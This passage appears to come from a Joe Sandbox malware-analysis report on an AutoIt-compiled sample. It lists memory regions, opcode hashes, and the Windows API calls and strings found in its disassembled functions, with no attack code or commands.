                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
                                                            • Instruction ID: 480ccd50a65614688c5a585177538a6481bd18ce8d72143957c03d745c6151b0
                                                            • Opcode Fuzzy Hash: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
                                                            • Instruction Fuzzy Hash: BCA193B29093109FC344CF1AD88055BBBE2BFC8614F5AC96EF89897315D770E9458F8A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                                                            • Instruction ID: ff6d5df8c18bcbe8fe2101f5cfd884a08bdb116bda97db56ce45bba43b3dbdc4
                                                            • Opcode Fuzzy Hash: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                                                            • Instruction Fuzzy Hash: 5A6160736197818FC32CCE2CC89145ABBE2EEA521474C8F6DD4D687792D670FA09C792
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4dd8a885a926587e738a91183ccb4c459be548142e20a5cf2a95a904aba54aa6
                                                            • Instruction ID: e025bed16a9db187d19549b6d7e0aef21e8108a0b470b56c70a9684c2ba52ff0
                                                            • Opcode Fuzzy Hash: 4dd8a885a926587e738a91183ccb4c459be548142e20a5cf2a95a904aba54aa6
                                                            • Instruction Fuzzy Hash: 43610235928BA44BC312AF39E84167AB3D4FFD6385F54C77EEA8173A90DF24110A8744
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03fc354a8b6bb11c7c1489ef2a31dc6bd0ae6d2b5af5c3011d2ae4e86530258a
                                                            • Instruction ID: b446432b5621173e9b1ca93a5ca895b85c72704aa26c9e2e25e9eb912e679961
                                                            • Opcode Fuzzy Hash: 03fc354a8b6bb11c7c1489ef2a31dc6bd0ae6d2b5af5c3011d2ae4e86530258a
                                                            • Instruction Fuzzy Hash: FC41265664DBC15EEB36823444823E2BFD2DF72309F0889ADD8C247A83D15AB54EC366
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                            • Instruction ID: 9ca45030816374493ad504bef7778a68cc74dc5459e378cd5d504e344b198e9f
                                                            • Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                            • Instruction Fuzzy Hash: 4C314A32A063845BCF328A6DDC146B57F64BB77775F1D51A7E4C28B192C221AC40C669
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b395afaa47f5cc7ecd3aedb19dcb8c673148562eb119a099dff518cea07a4fd
                                                            • Instruction ID: 3daba6d88d0757330380d81215678abb834f0e3c60a8108e0b40453e2618ba9a
                                                            • Opcode Fuzzy Hash: 4b395afaa47f5cc7ecd3aedb19dcb8c673148562eb119a099dff518cea07a4fd
                                                            • Instruction Fuzzy Hash: B441C8306083554FC718EE69D8E077BB3D2FBC9316F5549BEDAC693280CA386419CB51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                                                            • Instruction ID: 1f93681bd071c9b310666e60ae9e723361838b6add535ed4ccf0dafbb0d06587
                                                            • Opcode Fuzzy Hash: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                                                            • Instruction Fuzzy Hash: 1E4170756183019F8348CF69C58091AFBE2BFCC318F25896EE8999B311D735E942CF92
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                                                            • Instruction ID: b5869b5d75bce0de78fe886a00a9b2f8a43124a0caffc1323e520ea091567c1b
                                                            • Opcode Fuzzy Hash: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                                                            • Instruction Fuzzy Hash: 4441AF456DE1C21EEB0B0B7190762E2EFF16CAF0487AEAAD9C0D80E203C503C587DB94
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                            • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                            • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                            • Instruction Fuzzy Hash:
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                                                            • IsWindowVisible.USER32(?), ref: 0048364B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpperVisibleWindow
                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 4105515805-45149045
                                                            • Opcode ID: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
                                                            • Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
                                                            • Opcode Fuzzy Hash: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
                                                            • Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 0048A630
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                                                            • GetSysColor.USER32(0000000F), ref: 0048A66D
                                                            • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                                                            • SelectObject.GDI32(?,00000000), ref: 0048A696
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                                                            • GetSysColor.USER32(00000010), ref: 0048A6C9
                                                            • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                                                            • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                                                            • DeleteObject.GDI32(00000000), ref: 0048A6E6
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                                                            • FillRect.USER32(?,?,00000000), ref: 0048A763
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                                                              • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                                                              • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                                                              • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                              • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                                                              • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                                                              • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                              • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                                                              • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                              • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                                                              • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                              • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                              • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                              • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 3521893082-0
                                                            • Opcode ID: ec2639f69f933706b11dccfb949893be1b9929587e6cb69f8a25289cd697609d
                                                            • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                                                            • Opcode Fuzzy Hash: ec2639f69f933706b11dccfb949893be1b9929587e6cb69f8a25289cd697609d
                                                            • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 004774DE
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                                                            • GetClientRect.USER32(00000000,?), ref: 0047763F
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                                                            • GetStockObject.GDI32(00000011), ref: 004776A2
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                                                            • DeleteDC.GDI32(00000000), ref: 004776C8
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                                            • GetStockObject.GDI32(00000011), ref: 004777A6
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                                                            • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                                                            • Opcode Fuzzy Hash: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                                                            • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                                                            • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                                            • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
                                                            • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                                                            • Opcode Fuzzy Hash: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
                                                            • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            • Opcode ID: 8fb65e0ec88afc54829611c8f5f854c2612842bad9cfce82bf920dde39785c66
                                                            • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                                                            • Opcode Fuzzy Hash: 8fb65e0ec88afc54829611c8f5f854c2612842bad9cfce82bf920dde39785c66
                                                            • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 0048A903
                                                            • SetTextColor.GDI32(?,?), ref: 0048A907
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                            • GetSysColor.USER32(0000000F), ref: 0048A928
                                                            • CreateSolidBrush.GDI32(?), ref: 0048A92D
                                                            • GetSysColor.USER32(00000011), ref: 0048A945
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                            • SelectObject.GDI32(?,00000000), ref: 0048A964
                                                            • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                            • SelectObject.GDI32(?,?), ref: 0048A97A
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                                                            • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                                                            • GetSysColor.USER32(00000011), ref: 0048AA4B
                                                            • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                                                            • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                                                            • DeleteObject.GDI32(?), ref: 0048AA89
                                                            • SelectObject.GDI32(?,?), ref: 0048AA8F
                                                            • DeleteObject.GDI32(?), ref: 0048AA94
                                                            • SetTextColor.GDI32(?,?), ref: 0048AA9A
                                                            • SetBkColor.GDI32(?,?), ref: 0048AAA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: bd028f769453b6c3e6d525d3156cee2d00902cec730831e2e236b148d654384e
                                                            • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                                                            • Opcode Fuzzy Hash: bd028f769453b6c3e6d525d3156cee2d00902cec730831e2e236b148d654384e
                                                            • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                                                            • CharNextW.USER32(0000014E), ref: 00488B01
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                                                            • _memset.LIBCMT ref: 00488C44
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                                                            • _memset.LIBCMT ref: 00488CEC
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                                                            • DrawMenuBar.USER32(?), ref: 00488EC3
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0
                                                            • API String ID: 1073566785-4108050209
                                                            • Opcode ID: e753816477743e7a4e61ca736823783773d43a39939b42629400f0583fecbb55
                                                            • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                                                            • Opcode Fuzzy Hash: e753816477743e7a4e61ca736823783773d43a39939b42629400f0583fecbb55
                                                            • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 004849CA
                                                            • GetDesktopWindow.USER32 ref: 004849DF
